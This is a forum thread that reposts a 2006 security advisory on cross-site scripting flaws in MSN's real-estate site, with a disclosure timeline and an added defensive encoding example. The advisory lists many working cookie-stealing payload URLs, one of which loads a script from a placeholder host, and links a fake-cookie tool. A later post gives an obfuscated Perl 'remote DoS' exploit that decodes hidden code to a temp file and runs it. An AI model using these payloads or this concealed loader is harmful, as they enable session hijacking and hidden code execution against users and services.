Hotmail/MSN Multiple cross site scripting ( XSS )

Started by insanity, 14 September 2006, 05:00:30 PM


insanity

Author:  Securma Massine
MorX Security Research Team
http://www.morx.org

Original Advisory/Xploit : http://www.morx.org/msnxss.txt

Vulnerability : Multiple cross site scripting ( XSS )
 
Severity: Medium/High

Description: msn.com suffers from multiple XSS which could allow an attacker to hijack web sessions. This vulnerability can be used to gather the victim's cookies, steal his session, ...

Proof of Concept/Example of the issue: a great number of XSS (hundred) in http://realtor.realestate.msn.com

These are only some examples:
http://realtor.realestate.msn.com/Default.asp?poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss=loc&ad=http%3A%2F%2Frealtor.realestate.msn.com%2FFindNeig%2Fdefault.asp%3Flnksrc%3DREALR2LF2C0058%26poe%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

http://realtor.realestate.msn.com/SiteMap.asp?lnksrc=RDC-NAV-0005&poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/RealtyTimes/marketconditions.asp?link=http://yoursite/xss.js?open&pID=r.com2

http://realtor.realestate.msn.com/PersPlanOut/ArticleEmail.asp?anm=REALTOR%2Ecom%3A+Real+Estate+101&alnk=http%3A%2F%2Frealtor%2Erealestate%2Emsn%2Ecom%2Fbasics%2Findex%2Easp%3Flnksrc%3DREALR2LF2C0039%26poe%3D%22%3E%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C%2Fscript%3E

http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Basics/AllAbout/TypesStyles/Index.asp?poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/NearbySearch.asp?frm=bymlsid"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms=Bad%20Credit&lnksrc=OVER_SRCH_RDC1"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Gateways/MSN/Default.asp?ct="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst""&ct="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/InterimSearch.asp?typ=1%2C+2%2C+3%2C+4%2C+5%2C+6%2C+7&mxprice=99999999&mlsttl=&mnbath=0&frm=bymap&pgnum=1&st=CA&mls=xmls&mnbed=0&js=on&ct=Orange&zp=&mnprice=0&areaid="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/california/nborange.asp?"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fah&miss=loc&typ="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/default.asp?mode=MLS&"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/default.asp?mode=City&"><script>alert(document.cookie);</script>&poe=realtor

and many, many others...

Screen captures: http://www.morx.org/msnx.jpg

workaround: The Hotmail exploit can easily be executed via e-mails, links, messenger, attachment.
You can use this tool to open the browser with a fake Hotmail cookie (IE):
http://www.morx.org/hotcookie.exe

Disclosure timeline:
07/30/2006 Issue disclosed to Microsoft
07/30/2006 Response received from secure@microsoft.com
09/05/2006 fix some xss
09/07/2006 sending to microsoft new list of msn xss
12/09/2006 announce the fix of all the xss in 24h
13/09/2006 fixed
14/09/2006 public advisory


Greets: Attitude and all morx team

Disclaimer:
The author does not have any responsibility for any malicious use of this advisory or proof of concept code. The code and the information provided here are for educational purposes only.
For comments or additional questions, feel free to email me at securma_at_morx_org.
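
The `">` prefix in the examples above closes a quoted HTML attribute before the script element begins. The following is an added example, not part of the original advisory or of this thread: it shows the same value rendered unencoded and encoded, plus a log-side check that also catches the percent-encoded form nested inside another URL parameter. Function names and the sample request targets are constructed for illustration.

```javascript
// Added example; all function names and sample request targets are hypothetical.
const PAYLOAD = '"><script>alert(document.cookie);</script>'; // string quoted in the advisory

// Vulnerable pattern: the query value is concatenated into a quoted attribute.
function renderUnencoded(value) {
  return '<input type="hidden" name="poe" value="' + value + '">';
}

// Hardened pattern: encode the characters that are significant in HTML before
// the value reaches the attribute, so the quote can no longer close it.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderEncoded(value) {
  return '<input type="hidden" name="poe" value="' + encodeForHtmlAttribute(value) + '">';
}

// Percent-decode repeatedly (bounded): the breakout can sit inside a URL that
// is itself passed as a parameter value.
function decodeLayers(text, maxRounds = 3) {
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current.replace(/\+/g, ' ')); }
    catch { break; } // malformed escape sequence: keep what was decoded so far
    if (next === current) break;
    current = next;
  }
  return current;
}

// Flag a request target whose query string, once decoded, closes an
// attribute and tag and then opens a script element.
const BREAKOUT = /["']\s*>\s*<\s*script\b/i;
function flagsBreakout(requestTarget) {
  const q = requestTarget.indexOf('?');
  if (q === -1) return false;
  return BREAKOUT.test(decodeLayers(requestTarget.slice(q + 1)));
}

// Constructed request targets (not taken from real logs): raw, nested and
// double-encoded, and a benign search.
const SAMPLES = [
  '/Default.asp?poe=' + PAYLOAD,
  '/Msgs/NoResolve.asp?ad=' +
    encodeURIComponent('http://app.example.test/x.asp?poe=' + encodeURIComponent(PAYLOAD)),
  '/websearch/searchresults.asp?searchterms=Bad%20Credit',
];
function scan(samples = SAMPLES) {
  return samples.map(flagsBreakout);
}
```

Encoding at output is the fix; the log check only helps find which parameters are being probed.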



Mago

Nothing like one day after another!

keyhell

Update. 
#!/usr/bin/perl
#
# MSN Live accounts remote DoS
# by: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
# 3 january 2007
# MorX Security Research Team
# www.morx.org
#
# Details:
#
# please see the previous exploit release for vulnerability details
# at www.morx.org/fuckmsn.txt since this is just an update supporting
# SSL which was implemented by MSN new authentication server.
#
# Disclaimer:

# this entire document is for educational, testing and demonstrating
# purpose only.
# Modification use and/or publishing this information is entirely on
# your OWN risk, I cannot be held responsible for any of the above
#
# requires Net::SSLeay module which can be downloaded from
# http://search.cpan.org/CPAN/authors/id/F/FL/FLORA/Net_SSLeay.pm-1.30.tar.gz
#
# the source code can be easily decrypted for most of the experienced
# perl people. but at least those brainless lamers and scriptkiddies-
# wannabe would make a little effort before deleting my name and putting
# their lame nicknames.
#
# Enjoy, from Morocco.

package IIIkeyUnLock;
require Exporter;
@ISA       = qw(Exporter);
@EXPORT    = qw(_pENCd3k new);
@EXPORT_OK = qw(_pENCd3k new);

use strict;

sub new {
my $object = {};
bless $object;
return $object;
}

sub _pENCd3k ($$) {
my ($class, $_s, $_k1) = @_;

$_s = reverse($_s);
$_s =~ tr/\.\-\+\!\=\^/abcdef/;

my $_b = ord( substr( $_k1, 0, 1 ) );
my $_k2  = $_b ** 7;
my @_k_2 = split ( /''/, $_k2 );
$_k2  = join '', @_k_2;
my $_k3  = reverse($_k1);
$_k3 =~ tr/[a-m][n-z]/[n-z][a-m]/;
$_k3 =~ tr/[A-M][N-Z]/[N-Z][A-M]/;

my @_w1 = ();
for ( my $_d = 0 ; $_d < length($_s) ; $_d = $_d + 2 ) {
$_w1[$_d] = chr( hex( substr( $_s, $_d, 2 ) ) );
}

my $_w2 = join '', @_w1;
my $_r1 = _pENCxor( $_w2, $_k3 );
my $_r2 = _pENCxor( $_r1, $_k2 );
my $_o  = _pENCxor( $_r2, $_k1 );
return($_o);
}

sub _pENCxor ($$) {
my ($_P1, $_K1) = @_;

while ( length($_K1) < length($_P1) ) { $_K1 .= $_K1; }
$_K1 = substr( $_K1, 0, length($_P1) );

my @_p = split ( //, $_P1 );
my @_k = split ( //, $_K1 );

my $_i = 0;
my @_e = map { chr(ord($_) ^ ord($_k[$_i++])) } @_p;

my $_r = join '', @_e;
return($_r);
}

1;

use strict;

my $pENCobj = new IIIkeyUnLock;

open (cENC,">.//\x66\x6d\x2e\x74\x6d\x70") || die "xploit failed\n";
my $cmd;
while ( $cmd = <DATA> ) {
last if $cmd =~ /__END_DATA__/;
$cmd =~ s/\n//;
$cmd = $pENCobj->_pENCd3k($cmd, "morxdotorg");
print cENC $cmd;
}
close(cENC);

my $argvc=join(' ',@ARGV);
$argvc="" unless defined $argvc;
eval { system("\x70\x65\x72\x6c\x20\x66\x6d\x2e\x74\x6d\x70 ".$argvc) == 0 or die "xploit failed\n"; };
unlink(".//\x66\x6d\x2e\x74\x6d\x70");

1;

__DATA__
__END_DATA__


Quote:
# the source code can be easily decrypted for most of the experienced
# perl people.

Would any experienced Perl user here on the forum help decrypt it?

Regards ;D
I would rather die standing than live forever on my knees.
(Ernesto "Che" Guevara)

Mago

Quote from: "keyhell": Update.
Quote:
# the source code can be easily decrypted for most of the experienced
# perl people.

Would any experienced Perl user here on the forum help decrypt it?

Regards ;D

Why decrypt this?
Nothing like one day after another!

Mago

I think I found a new XSS vuln,
I'm going to run some tests here first.

See you later.
Nothing like one day after another!